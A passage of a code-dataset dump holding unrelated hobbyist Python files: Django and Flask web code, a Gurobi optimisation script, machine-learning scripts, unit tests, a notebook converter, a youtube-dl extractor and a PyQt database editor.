'colorama.views.index'),\r\n url(r'^portfolio$', 'colorama.views.portfolio'),\r\n url(r'^project/(?P\\d+)/$', 'colorama.views.project'),\r\n url(r'^about$', 'colorama.views.about'),\r\n url(r'^blog$', 'colorama.views.blog'),\r\n url(r'^contact$', 'colorama.views.contact'),\r\n)","sub_path":"web/web/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":756,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"473858644","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Mon Mar 8 16:16:28 2021\r\n@author: natma\r\n\"\"\"\r\nfrom gurobipy import *\r\nimport numpy as np\r\n\r\nN=10#Needy people to be served\r\n\r\ndef Ufairshare(n0,n1,n2,n3,d1,d2,d3):\r\n \r\n L=150#demand curve\r\n f=np.zeros(4)#freshness\r\n p=np.array([1,0.75,0.50,0.25])#Price\r\n cost=max(0.25,0.5-L*0.001)#cost\r\n profit=0\r\n fine=0.05\r\n #proportion of needed served by farshare\r\n n = np.array([n0,n1,n2,n3])\r\n\r\n cum_n=0\r\n cum_R=0\r\n #terms in fairshare penalty equation\r\n term_3=0\r\n fareshare_penalty=0\r\n \r\n #Supermarket Utility\r\n Waste=0\r\n Profit=0\r\n Benefit_Fairshare=0\r\n \r\n\r\n for i in range(4):\r\n f[i]=(4-i)/4\r\n term_3+=(n[i]*(1.0-f[i]))\r\n R_pure=L*(f[i]/2.5)\r\n sigmoid=(L/5)*np.tanh(p[i]-0.5)\r\n cum_n=n[i]+cum_n\r\n# 
R=min(R_pure-sigmoid,L-cum_n-cum_R)\r\n        R=L-cum_n-cum_R\r\n        cum_R=R+cum_R\r\n        waste=L-cum_R-cum_n\r\n        profit+=(p[i]*R)\r\n        \r\n    ###########################\r\n    expand_1=N*N\r\n    expand_2=cum_n*cum_n\r\n    ##############################\r\n    expand_3=2*N*cum_n\r\n    #################################\r\n#    expand_5=expand_1+expand_2-expand_4\r\n    expand_5=expand_1+expand_2-expand_3\r\n    expand_6=d2/expand_1\r\n    \r\n    ##############################################\r\n    term_2=expand_5*expand_6\r\n    term_3=d3*term_3\r\n    fareshare_penalty=term_2+term_3\r\n    \r\n    Waste=fine*waste\r\n    Profit=profit-(cost*L)\r\n    \r\n    Benefit_Fairshare= (d1*N)-(fareshare_penalty)\r\n    Total=Profit-(Waste)+Benefit_Fairshare\r\n    return Total\r\n\r\n\r\ndef main():\r\n    \r\n    milp_model = Model(\"milp\")\r\n    \r\n    for d2 in range (1,11):\r\n        d1 = milp_model.addVar(vtype=GRB.INTEGER,lb=1,name=\"d1\")\r\n        d3 = milp_model.addVar(vtype=GRB.INTEGER,lb=1,name=\"d3\")\r\n        n0 = milp_model.addVar(vtype=GRB.INTEGER,lb=0,name=\"n0\")\r\n        n1 = milp_model.addVar(vtype=GRB.INTEGER,lb=0,name=\"n1\")\r\n        n2 = milp_model.addVar(vtype=GRB.INTEGER,lb=0,name=\"n2\")\r\n        n3 = milp_model.addVar(vtype=GRB.INTEGER,lb=0,name=\"n3\")\r\n        obj_fun = Ufairshare(n0,n1,n2,n3,d1,d2,d3)\r\n        milp_model.setObjective(obj_fun,GRB.MAXIMIZE)\r\n        \r\n        c1 = milp_model.addConstr(n0+n1+n2+n3<=N,\"c1\")\r\n        c2 = milp_model.addConstr(d1+d2+d3<=30,\"c2\")\r\n        c3 = milp_model.addConstr(d1<=10,\"c3\")\r\n        c5 = milp_model.addConstr(d3<=10,\"c5\")\r\n\r\n        \r\n#        milp_model.params.NonConvex = 2\r\n        milp_model.optimize()\r\n        \r\n        print('Objective Function Value:%.2f' %milp_model.objVal)\r\n        #get values\r\n        for v in milp_model.getVars():\r\n            print('%s:%g'%(v.varName,v.x))\r\n\r\n\r\n    \r\nif __name__== \"__main__\":\r\n    main()\r\n","sub_path":"fare_share optimisation.py","file_name":"fare_share optimisation.py","file_ext":"py","file_size_in_byte":2703,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"414931269","text":"from django.shortcuts import render, redirect, reverse, get_object_or_404\nfrom .models import scents, products\n\n\ndef all_products(request):\n    \"\"\" A view to show the list of products \"\"\"\n\n    product = products.objects.all()\n\n    context = {\n        \n        'product': product,\n    }\n\n    return render(request, 'product/products.html', context)\n\n\ndef product_detail(request, products_id):\n    \"\"\" A view to show individual product details \"\"\"\n\n    product_det = get_object_or_404(products, pk=products_id)\n    scent = scents.objects.all()\n\n    context = {\n        'product_det': product_det,\n        'scent': scent,\n    }\n\n    return render(request, 'product/product_detail.html', context)\n\n","sub_path":"product/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":694,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"534242137","text":"from flask import Flask\nfrom flask import redirect\nfrom flask.ext.script import Manager\n\n\napp = Flask(__name__)\nmanager = Manager(app)\n\n@app.route('/')\ndef index():\n\treturn redirect('http://www.google.com')\n\n@app.route('/user/<id>')\ndef get_user(id):\n\tuser = load_user(id)\n\tif not user:\n\t\tabort(404)\n\treturn '

<h1>Hello, %s!</h1>
    ' % user.name\n\n\nif __name__ == '__main__':\n\tmanager.run()\n","sub_path":"hello.py","file_name":"hello.py","file_ext":"py","file_size_in_byte":386,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"476508258","text":"from django.conf import settings\nfrom django.http import HttpResponse\nfrom django.template.base import TemplateDoesNotExist\nfrom tornado import template\n\n\ndef render_string(template_name, **kwargs):\n \"\"\"Generate the given template with the given arguments.\n\n We return the generated string. To generate and write a template\n as a response, use render() above.\n \"\"\"\n template_path = settings.TEMPLATE_DIRS[0]\n if template_path:\n loader = template.Loader(template_path)\n try:\n t = loader.load(template_name)\n except:\n raise\n return t.generate(**kwargs)\n else:\n error_msg = \"TEMPLATE_DIRS is not set in settings\"\n raise TemplateDoesNotExist(error_msg)\n\n\ndef render_response(template_name, **kwargs):\n # http_response_kwargs = {'mimetype': kwargs.pop('mimetype', None)}\n return HttpResponse(render_string(template_name, **kwargs))\n","sub_path":"django/render.py","file_name":"render.py","file_ext":"py","file_size_in_byte":918,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"72037753","text":"from BVDataset import BVDataset\nfrom torch import nn, optim\nimport torch\nimport os\nimport sys\nimport numpy as np\nfrom torchvision.utils import save_image\nfrom torchvision import datasets, transforms\nfrom torch.autograd import Variable\nimport torch.distributions.multivariate_normal as mn\nfrom model.BAGAN.encoder import Encoder\nfrom model.BAGAN.decoder import Decoder\n\n\ndef reparameterization(mu, logvar):\n std = logvar.mul(0.5).exp_()\n eps = Variable(std.data.new(std.size()).normal_())\n z = eps.mul(std).add_(mu)\n return z\n\ndef batch2one(Z, y, z, class_num):\n for i in range(y.shape[0]):\n Z[y[i]] = torch.cat((Z[y[i]], z[i].cpu()), dim=0) # Z[label][0] should be deleted..\n return Z\n\n\ncuda = torch.cuda.is_available()\ndevice = torch.device(\"cuda\" if cuda else \"cpu\")\nkwargs = {'num_workers': 1, 'pin_memory': True} if cuda else {}\nseed = 1\nin_channels = 3\nz_dim = 16\nimg_dim = 256\nlatent_size = 100\nlog_interval = 50\nmodel_save_path = \"/home/kdd/Documents/GAN/model/BAGAN/ave_checkpoints/\"\nz_dim = 16\nclass_num = 2\n\n\n\ntrain_root = '/home/kdd/Documents/GAN/data/torch_dataloader/train'\n\ndata_transforms = transforms.Compose([\n # tv.transforms.RandomCrop((64, 64), padding=4),\n transforms.Resize((img_dim,img_dim)),\n transforms.ToTensor(),\n])\n\ntrain_loader = torch.utils.data.DataLoader(\n datasets.ImageFolder(train_root, transform=data_transforms),\n batch_size = 150, shuffle=True, **kwargs)\n\n\n\nencoder = Encoder(in_channels, z_dim, latent_size, img_dim)\ndecoder = Decoder(latent_size, img_dim, z_dim)\n\nif torch.cuda.device_count() > 1:\n # model = nn.DataParallel(model)\n encoder = nn.DataParallel(encoder)\n decoder = nn.DataParallel(decoder)\n\n# model = model.to(device)\nencoder = encoder.to(device)\ndecoder = decoder.to(device)\n\n\nfor file in os.listdir(model_save_path):\n \n if file.startswith(\"encoder\") and file.endswith(\".tar\"):\n checkpointE = torch.load(model_save_path + file, map_location='cpu')\n encoder.module.load_state_dict(checkpointE['encoder_state_dict'])\n encoder.to(device)\n\n if file.startswith(\"decoder\") and file.endswith(\".tar\"):\n checkpointD = torch.load(model_save_path + file, 
map_location='cpu')\n decoder.module.load_state_dict(checkpointD['decoder_state_dict'])\n decoder.to(device)\n\nencoder.eval()\ndecoder.eval()\nZ = list()\ncovariances = list()\nmeans = list()\n\nn = 0\n\nwith torch.no_grad():\n for i in range(class_num):\n Z.append(torch.zeros((1, latent_size), dtype=torch.float))\n\n for i, (img, label) in enumerate(train_loader):\n img = img.to(device)\n latent_feature = encoder(img)\n n += 1\n # print(\"1 \",latent_feature.size())\n # print(n)\n latent_feature = latent_feature.view(-1, 1, latent_size)\n # print(\"2 \",latent_feature.size())\n Z = batch2one(Z, label, latent_feature, class_num)\n\n for i in range(class_num):\n label_mean = torch.mean(Z[i][1:], dim=0).double()\n label_cov = torch.from_numpy(np.cov(Z[i][1:].numpy(), rowvar=False)).double()\n means.append(label_mean)\n covariances.append(label_cov)\n\n # print(len(covariances),covariances[0].size())\n torch.save({\n 'means': means,\n 'covariances': covariances\n }, model_save_path + \"class_distribution.dt\")","sub_path":"get_distribution.py","file_name":"get_distribution.py","file_ext":"py","file_size_in_byte":3315,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"295106679","text":"import unittest\n\n\ndef factorize(x):\n \"\"\"\n Factorize positive integer and return its factors.\n :type x: int,>=0\n :rtype: tuple[N],N>0\n \"\"\"\n pass\n\n\nclass TestFactorize(unittest.TestCase):\n def test_wrong_types_raise_exception(self):\n self.cases = ('string', 1.5)\n for x in self.cases:\n with self.subTest(case=x):\n self.assertRaises(TypeError, factorize, x)\n\n def test_negative(self):\n self.cases = (-1, -10, -100)\n for x in self.cases:\n with self.subTest(case=x):\n self.assertRaises(ValueError, factorize, x)\n\n def test_zero_and_one_cases(self):\n self.cases = (0, 1)\n for x in self.cases:\n with self.subTest(case=x):\n a = factorize(x)\n self.assertEqual(a, (x,))\n\n def test_simple_numbers(self):\n self.cases = (3, 13, 29)\n for x in self.cases:\n with self.subTest(case=x):\n a = factorize(x)\n self.assertEqual(a, (x,))\n\n def test_two_simple_multipliers(self):\n self.cases = (6, 26, 121)\n self.cases2 = ((2, 3), (2, 13), (11, 11))\n for i, x in enumerate(self.cases):\n with self.subTest(case=x):\n a = factorize(x)\n self.assertIsInstance(a, tuple)\n self.assertEqual(len(a), 2)\n self.assertEqual(a, self.cases2[i])\n\n def test_many_multipliers(self):\n self.cases = (1001, 9699690)\n self.cases2 = ((7, 11, 13), (2, 3, 5, 7, 11, 13, 17, 19))\n for i, x in enumerate(self.cases):\n with self.subTest(case=x):\n a = factorize(x)\n self.assertIsInstance(a, tuple)\n self.assertGreater(len(a), 2)\n self.assertEqual(a, self.cases2[i])\n\n\nif True:\n unittest.main()\n","sub_path":"TestFactorize.py","file_name":"TestFactorize.py","file_ext":"py","file_size_in_byte":1857,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"75961269","text":"#!/usr/bin/env python3\n# Copyright (C) 2018 Frank Seifferth\n# SPDX-License-Identifier: GPL-3.0+\n\"\"\"Convert between jupyter notebook and pure python code\"\"\"\n\nimport sys, os, json, re\n\n\ndef ipynb_to_py(doc: str) -> str:\n \"\"\"Convert ipynb to pure python\"\"\"\n ipynb = json.loads(doc)\n py = [\"#!/usr/bin/env python3\"]\n for cell in ipynb[\"cells\"]:\n py.append(\"\\n\\n\")\n if cell[\"cell_type\"] == \"code\":\n py.append(\"### code cell ###\\n\")\n py += cell[\"source\"]\n else:\n py.append(\"### {} cell 
###\\n\".format(cell[\"cell_type\"]))\n for line in cell[\"source\"]:\n py.append(\"# \"+line)\n return \"\".join(py)\n\n\ndef py_to_ipynb(doc: str) -> str:\n \"\"\"Convert pure python to ipynb\"\"\"\n def new_ipynb():\n return { \"cells\": [],\n \"metadata\": {\n 'kernelspec': {\n 'display_name': 'Python 3',\n 'language': 'python',\n 'name': 'python3' },\n 'language_info': {\n 'codemirror_mode': {\n 'name': 'ipython',\n 'version': 3 },\n 'file_extension': '.py',\n 'mimetype': 'text/x-python',\n 'name': 'python',\n 'nbconvert_exporter': 'python',\n 'pygments_lexer': 'ipython3',\n 'version': '3.7.1' } },\n \"nbformat\": 4, \"nbformat_minor\": 2 }\n\n def new_cell(celltype):\n if celltype == \"code\":\n return { \"cell_type\": \"code\",\n \"execution_count\": None,\n \"metadata\": {},\n \"outputs\": [],\n \"source\": [] }\n else:\n return { \"cell_type\": celltype,\n \"metadata\": {},\n \"source\": [] }\n\n def remove_trailing_newlines(cells):\n try:\n source = cells[-1][\"source\"]\n while source[-1].strip() == \"\":\n del source[-1]\n if source[-1][-1] == \"\\n\":\n source[-1] = source[-1][:-1]\n except IndexError:\n pass\n\n def is_empty(line):\n return line == \"\" or re.match(\"^# *$\", line)\n\n def implicit_codecell(line):\n if celltype == \"code\":\n return False\n l_0 = line.strip()[:1]\n if l_0 and l_0 != \"#\":\n return True\n return False\n\n py = doc.splitlines()\n ipynb = new_ipynb()\n cells = ipynb[\"cells\"]\n # Remove shebang line (if any) and initial newlines\n if py[0].startswith(\"#!\"):\n del py[0]\n if is_empty(py[0]):\n del py[0]\n # Process all cells\n celltype = \"code\"\n regex_newcell = re.compile(\"^ *###+ *([a-z]+) +cell *###+ *$\")\n for line in py:\n if regex_newcell.match(line):\n remove_trailing_newlines(cells)\n celltype = regex_newcell.match(line).groups()[0]\n cells.append(new_cell(celltype))\n elif implicit_codecell(line):\n remove_trailing_newlines(cells)\n celltype = \"code\"\n cells.append(new_cell(\"code\"))\n cells[-1][\"source\"].append(line+\"\\n\")\n elif cells and not cells[-1][\"source\"] and is_empty(line):\n pass # Remove initial newlines\n else:\n if not cells: # Handle python code before cell specification\n cells.append(new_cell(celltype))\n if celltype == \"code\":\n cells[-1][\"source\"].append(line+\"\\n\")\n else:\n cells[-1][\"source\"].append(re.sub(\"^# ?\", \"\", line+\"\\n\"))\n remove_trailing_newlines(cells)\n return json.dumps(ipynb, indent=1)\n\n\nif __name__ == \"__main__\":\n usage = \"Usage: unpyter \"\n\n if len(sys.argv) != 2:\n print(usage, file=sys.stderr)\n exit(1)\n\n if sys.argv[1] in [\"-h\", \"--help\"]:\n print(usage)\n exit(0)\n elif os.path.isfile(sys.argv[1]):\n with open(sys.argv[1]) as f:\n doc = f.read()\n if sys.argv[1].endswith(\".ipynb\"):\n print(ipynb_to_py(doc))\n elif sys.argv[1].endswith(\".py\"):\n print(py_to_ipynb(doc))\n else:\n print(\"Filename extension not recognized. 
Supported\\n\"\n                  \"extensions are '.py' or '.ipynb'.\", file=sys.stderr)\n            exit(1)\n    else:\n        print(usage, file=sys.stderr)\n        exit(1)\n","sub_path":"unpyter.py","file_name":"unpyter.py","file_ext":"py","file_size_in_byte":4509,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"205207283","text":"#Determine if an article is fake news or not\r\n#practice on my own\r\n#data from kaggle\r\nimport os\r\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '3' #disables tf telling me i have wrong gpu\r\nimport tensorflow as tf\r\nfrom tensorflow import keras\r\nimport numpy as np\r\nimport pandas as pd\r\n\r\nsentences = pd.read_csv('TorF.csv').title\r\nlabels = pd.read_csv('TorF.csv').label\r\n\r\nvocab_size = 10000\r\nembedding_dim = 16\r\nmax_length = 100\r\ntrunc_type='post'\r\npadding_type='post'\r\noov_tok = \"<OOV>\"\r\ntraining_size = 10000\r\n\r\n#Defining our data\r\n#trying to make an even split between true and false headlines\r\ntraining_sentences1 = sentences[:training_size]\r\ntraining_sentences2 = sentences[2*training_size:]\r\ntraining_sentences = pd.concat([training_sentences1,training_sentences2])\r\n\r\ntesting_sentences = sentences[training_size:2*training_size]\r\n\r\ntraining_labels1 = labels[:training_size]\r\ntraining_labels2 = labels[2*training_size:]\r\ntraining_labels = pd.concat([training_labels1,training_labels2])\r\n\r\ntesting_labels = labels[training_size:2*training_size]\r\n\r\n#doing the previous work of tokenizing each sentence\r\nfrom tensorflow.keras.preprocessing.text import Tokenizer\r\nfrom tensorflow.keras.preprocessing.sequence import pad_sequences\r\n\r\ntokenizer = Tokenizer(num_words = vocab_size ,oov_token = oov_tok)\r\ntokenizer.fit_on_texts(training_sentences)\r\n\r\nword_index = tokenizer.word_index\r\n\r\n\r\n#putting sentences into sequences and then padding them to be equal length\r\ntraining_sequences = tokenizer.texts_to_sequences(training_sentences)\r\ntraining_padded = pad_sequences(training_sequences, padding = padding_type, maxlen = max_length, truncating = trunc_type)\r\n\r\ntesting_sequences = tokenizer.texts_to_sequences(testing_sentences)\r\ntesting_padded = pad_sequences(testing_sequences, padding = padding_type, maxlen = max_length, truncating = trunc_type)\r\n\r\n#need to put so it runs properly\r\nimport numpy as np\r\ntraining_padded = np.array(training_padded)\r\ntraining_labels = np.array(training_labels)\r\ntesting_padded = np.array(testing_padded)\r\ntesting_labels = np.array(testing_labels)\r\n\r\n#define the model\r\nmodel = tf.keras.Sequential([\r\n\t\ttf.keras.layers.Embedding(vocab_size, embedding_dim, input_length = max_length),\r\n\t\ttf.keras.layers.GlobalAveragePooling1D(),\r\n\t\ttf.keras.layers.Dense(24, activation = 'relu'),\r\n\t\ttf.keras.layers.Dense(1,activation = 'sigmoid')\r\n\t])\r\nmodel.compile(loss = 'binary_crossentropy', optimizer ='adam', metrics = ['accuracy'])\r\n\r\nnum_epochs = 5\r\n\r\nhistory = model.fit(training_padded, training_labels, epochs = num_epochs, validation_data = (testing_padded, testing_labels), verbose = 2)\r\n\r\n\r\n\r\nsentence = [\"Republican leaders claim new yorkers will greet us millitary as liberators\"]\r\n\r\nsequences = tokenizer.texts_to_sequences(sentence)\r\n\r\npadded = pad_sequences(sequences,maxlen = max_length, padding=padding_type, truncating=trunc_type)\r\n\r\nprint(model.predict(padded))","sub_path":"Machine Learning/Deep Learning 
Series/DeepLearning3.py","file_name":"DeepLearning3.py","file_ext":"py","file_size_in_byte":2893,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"128017429","text":"# -*- coding: utf-8 -*-\n\n\"\"\"\nCreated on 11/27/20 4:13 PM\n@Author : Justin Jiang\n@Email : jw_jiang@pku.edu.com\n\"\"\"\n\n\ndef countCharacters(words, chars):\n def check(record, current):\n for key in current:\n if key not in record:\n return False\n if record.get(key) < current.get(key):\n return False\n return True\n\n record = dict()\n result = 0\n for char in chars:\n if char not in record:\n record.setdefault(char, 1)\n else:\n record[char] += 1\n for word in words:\n current = dict()\n for ch in word:\n if ch not in current:\n current.setdefault(ch, 1)\n else:\n current[ch] += 1\n if check(record, current):\n result += len(word)\n return result\n\n\nif __name__ == '__main__':\n words = [\"cat\", \"bt\", \"hat\", \"tree\"]\n chars = \"atach\"\n print(countCharacters(words, chars))\n","sub_path":"20201029/1160_countCharacters.py","file_name":"1160_countCharacters.py","file_ext":"py","file_size_in_byte":965,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"517246551","text":"# coding: utf-8\nfrom __future__ import unicode_literals\n\nfrom .common import InfoExtractor\n\nfrom .brightcove import BrightcoveNewIE\n\nimport re\n\nclass ManchesterEveningNewsIE(InfoExtractor):\n _VALID_URL = r'https?://(?:www\\.)?manchestereveningnews.co.uk/news/'\n _TEST = {\n 'url': 'https://www.manchestereveningnews.co.uk/news/greater-manchester-news/moment-mcflys-danny-jones-surprises-16247191',\n 'md5': 'd1f4229ce36196f8a8818f74e781d34d',\n 'info_dict': {\n 'id': '16247191',\n 'ext': 'mp4',\n 'title': \"Moment McFly's Danny Jones surprises Pride of Manchester award winner on stage\",\n 'description' : ' Emma Harris was delighted at seeing McFly star Danny Jones on stage to present her with a Pride of Manchester award '\n }\n }\n\n def _real_extract(self, url):\n video_id = url.rsplit('-', 1)[-1]\n webpage = self._download_webpage(url, video_id)\n brightcove_url = re.findall('', webpage)\n title = re.findall('', webpage)\n description = re.findall('', webpage)\n\n return {\n 'title': title[0],\n 'url': brightcove_url[0],\n 'id': video_id,\n 'description': description[0]\n }","sub_path":"youtube_dl/extractor/manchestereveningnews.py","file_name":"manchestereveningnews.py","file_ext":"py","file_size_in_byte":1379,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"45302758","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\nfrom PyQt4 import QtGui, QtCore\nfrom Queries import Queries\n\nclass EditCompounds(QtGui.QWidget):\n\tdef __init__(self):\n\t\tsuper(EditCompounds, self).__init__()\n\t\t# functions\n\t\tself.getCompoundsMatrix()\n\t\tself.initUI()\n\tdef getCompoundsMatrix(self):\n\t\tcolumns_list = {\"id,singular,plural,environments\"}\n\t\tquery_list = {\n\t\t\t\"database\" : \"nlp\",\n\t\t\t\"query_type\" : \"SELECT\",\n\t\t\t\"table\" : \"compounds\",\n\t\t\t\"columns_list\" : columns_list,\n\t\t\t\"id\" : \"*\"\n\t\t}\n\t\tqueries_obj = Queries(query_list)\n\t\tresult = queries_obj.returnResult()\n\t\t# create compounds matrix\n\t\tself.compounds_matrix = []\n\t\tfor compound_tupel in result:\n\t\t\tenvironments_list = compound_tupel[3].split(\",\")\n\t\t\tself.compounds_matrix.append({\"id\" : str(compound_tupel[0]),\"singular\" : compound_tupel[1],\"plural\" : 
compound_tupel[2],\"environments\" : compound_tupel[3]})\n\t\t# order alphabetically \n\t\tself.compounds_matrix = sorted(self.compounds_matrix, key=lambda i: i['singular'].lower()) \t\n\tdef initUI(self):\n\t\t# grid\n\t\tgrid = QtGui.QGridLayout()\n\t\tgrid.setAlignment(QtCore.Qt.AlignTop)\n\t\t# spacer\n\t\tgrid.setRowMinimumHeight(0,10)\n\t\t# new \n\t\tbutton = QtGui.QPushButton('&new compound', self)\n\t\tsubmit_dict = {\"mode\" : \"new\",\"id\" : \"\"}\n\t\tbutton.pressed.connect(lambda arg = submit_dict : self.clickListButton(arg))\n\t\tgrid.addWidget(button,1,0)\n\t\t# spacer\n\t\tgrid.setRowMinimumHeight(2,30)\n\t\t# advice\n\t\tif len(self.compounds_matrix) == 0:\t\t\t\n\t\t\tlabel_str = QtCore.QString(\"No compounds in database.\")\n\t\t\tlabel = QtGui.QLabel(label_str)\n\t\t\tlabel.setStyleSheet('color: red')\n\t\t\tlabel.setFixedWidth(400)\n\t\t\tgrid.addWidget(label,3,0)\n\t\t# list compounds matrix\n\t\tcount = 3\n\t\tstart = count - 1 \n\t\tfor compound_list in self.compounds_matrix:\n\t\t\t# font \n\t\t\tfont = QtGui.QFont()\n\t\t\tfont.setPointSize(10)\n\t\t\t# singular\n\t\t\tlabel_str = QtCore.QString(compound_list[\"singular\"])\n\t\t\tlabel = QtGui.QLabel(label_str)\n\t\t\tlabel.setFont(font)\n\t\t\tlabel.setFixedWidth(400)\n\t\t\tgrid.addWidget(label,count,0)\n\t\t\t# plural\n\t\t\tlabel_str = QtCore.QString(compound_list[\"plural\"])\n\t\t\tlabel = QtGui.QLabel(label_str)\n\t\t\tlabel.setFont(font)\n\t\t\tlabel.setFixedWidth(400)\n\t\t\tgrid.addWidget(label,count,1)\n\t\t\t# edit \n\t\t\tbutton = QtGui.QPushButton('edit', self)\n\t\t\tbutton.setFont(font)\n\t\t\tbutton.setFixedWidth(100)\n\t\t\tbutton.setFixedHeight(22)\n\t\t\tsubmit_dict = {\"mode\" : \"edit\",\"id\" : compound_list[\"id\"]}\n\t\t\tbutton.pressed.connect(lambda arg = submit_dict : self.clickListButton(arg))\n\t\t\tgrid.addWidget(button,count,2)\t\n\t\t\t# delete \n\t\t\tbutton = QtGui.QPushButton('delete', self)\n\t\t\tbutton.setFont(font)\n\t\t\tbutton.setFixedWidth(100)\n\t\t\tbutton.setFixedHeight(22)\n\t\t\tsubmit_dict = {\"mode\" : \"delete\",\"id\" : compound_list[\"id\"]}\n\t\t\tbutton.pressed.connect(lambda arg = submit_dict : self.clickListButton(arg))\n\t\t\tgrid.addWidget(button,count,3)\t\n\t\t\t# count\n\t\t\tcount += 1\n\t\t# set layout\n\t\tself.setLayout(grid)\n\tdef clickListButton(self,submit_dict):\n\t\t# get index\n\t\tname_indexer = dict((p[\"id\"], i) for i, p in enumerate(self.compounds_matrix))\n\t\tindex = name_indexer.get(submit_dict[\"id\"], -1)\n\t\t# get submit type and number\t\t\n\t\tif submit_dict[\"mode\"] == \"new\":\t\t\t\n\t\t\tsingular = \"\"\n\t\t\tplural = \"\"\n\t\t\tenvironments = \"global\"\n\t\t\tself.openNewEditDialog(submit_dict,singular,plural,environments)\n\t\tif submit_dict[\"mode\"] == \"edit\":\t\t\t\n\t\t\tsingular = self.compounds_matrix[index][\"singular\"]\n\t\t\tplural = self.compounds_matrix[index][\"plural\"]\n\t\t\tenvironments = self.compounds_matrix[index][\"environments\"]\n\t\t\tself.openNewEditDialog(submit_dict,singular,plural,environments)\n\t\tif submit_dict[\"mode\"] == \"delete\":\t\t\t\n\t\t\tsingular = self.compounds_matrix[index][\"singular\"]\n\t\t\tplural = self.compounds_matrix[index][\"plural\"]\n\t\t\tenvironments = self.compounds_matrix[index][\"environments\"]\n\t\t\tself.openDeleteDialog(submit_dict,singular,plural,environments)\n\tdef openNewEditDialog(self,submit_dict,singular,plural,environments):\n\t\t# dialog\n\t\tself.dialog = QtGui.QDialog(self)\n\t\ttitle = \"%s compound\" % 
submit_dict[\"mode\"]\n\t\tself.dialog.setWindowTitle(title)\n\t\t# layout\n\t\tself.dialog.setLayout(QtGui.QFormLayout())\n\t\tscreen = QtGui.QDesktopWidget().availableGeometry()\n\t\tself.dialog.setGeometry(screen.width()/2-420,screen.height()/2-300, 840,300)\n\t\tself.dialog.layout().setVerticalSpacing(10)\n\t\t# singular\n\t\tlabel_str = QtCore.QString(\"singular\")\n\t\tlabel = QtGui.QLabel(label_str)\n\t\tself.dialog.layout().addRow(label)\n\t\tself.singular_edit = QtGui.QLineEdit()\n\t\tself.singular_edit.setText(singular)\n\t\tself.singular_edit.setFixedWidth(800)\n\t\tself.dialog.layout().addRow(self.singular_edit)\n\t\t# plural\n\t\tlabel_str = QtCore.QString(\"plural\")\n\t\tlabel = QtGui.QLabel(label_str)\n\t\tself.dialog.layout().addRow(label)\n\t\tself.plural_edit = QtGui.QLineEdit()\n\t\tself.plural_edit.setText(plural)\n\t\tself.plural_edit.setFixedWidth(800)\n\t\tself.dialog.layout().addRow(self.plural_edit)\n\t\t# environments\n\t\tlabel_str = QtCore.QString(\"environments\")\n\t\tlabel = QtGui.QLabel(label_str)\n\t\tself.dialog.layout().addRow(label)\n\t\tself.environments_edit = QtGui.QLineEdit()\n\t\tself.environments_edit.setText(environments)\n\t\tself.environments_edit.setFixedWidth(800)\n\t\tself.dialog.layout().addRow(self.environments_edit)\n\t\t# spacer \n\t\tspacerItem = QtGui.QSpacerItem(1, 20)\n\t\tself.dialog.layout().addItem(spacerItem)\n\t\t# ok \n\t\tbutton = QtGui.QPushButton(\"ok\",self)\n\t\tbutton.setFixedWidth(300)\n\t\tbutton.pressed.connect(lambda arg = submit_dict : self.clickDialogButton(arg))\n\t\tself.dialog.layout().addRow(button)\n\t\t# modal \n\t\tself.dialog.exec_()\n\tdef openDeleteDialog(self,submit_dict,singular,plural,environments):\n\t\t# dialog\n\t\tself.dialog = QtGui.QDialog(self)\n\t\ttitle = \"%s compound\" % submit_dict[\"mode\"]\n\t\tself.dialog.setWindowTitle(title)\n\t\t# layout\n\t\tself.dialog.setLayout(QtGui.QFormLayout())\n\t\tscreen = QtGui.QDesktopWidget().availableGeometry()\n\t\tself.dialog.setGeometry(screen.width()/2-300,screen.height()/2-150,600,150)\n\t\tself.dialog.layout().setVerticalSpacing(10)\n\t\t# spacer \n\t\tspacerItem = QtGui.QSpacerItem(1,20)\n\t\tself.dialog.layout().addItem(spacerItem)\n\t\t# singular\n\t\tlabel_str = QtCore.QString(\"Delete '%s' ?\" % (singular)) \n\t\tlabel = QtGui.QLabel(label_str)\n\t\tself.dialog.layout().addRow(label)\n\t\t# spacer \n\t\tspacerItem = QtGui.QSpacerItem(1,20)\n\t\tself.dialog.layout().addItem(spacerItem)\n\t\t# ok \n\t\tbutton = QtGui.QPushButton(\"ok\",self)\n\t\tbutton.setFixedWidth(300)\n\t\tbutton.pressed.connect(lambda arg = submit_dict : self.clickDialogButton(arg))\n\t\tself.dialog.layout().addRow(button)\n\t\t# modal \n\t\tself.dialog.exec_()\n\tdef clickDialogButton(self,submit_dict):\n\t\t# get form content\n\t\tif submit_dict[\"mode\"] == \"new\" or submit_dict[\"mode\"] == \"edit\":\n\t\t\tdialog_content_dict = {\n\t\t\t\t\"singular\" : self.singular_edit.text().toUtf8().replace(\"'\",\"\\\\'\"),\n\t\t\t\t\"plural\" : self.plural_edit.text().toUtf8().replace(\"'\",\"\\\\'\"),\n\t\t\t\t\"environments\" : self.environments_edit.text().toUtf8().replace(\"'\",\"\\\\'\"),\n\t\t\t}\n\t\t# check mode\n\t\tif submit_dict[\"mode\"] == \"new\":\n\t\t\tself.newCompound(dialog_content_dict)\n\t\telif submit_dict[\"mode\"] == \"edit\":\n\t\t\tself.editCompound(submit_dict,dialog_content_dict)\n\t\telif submit_dict[\"mode\"] == 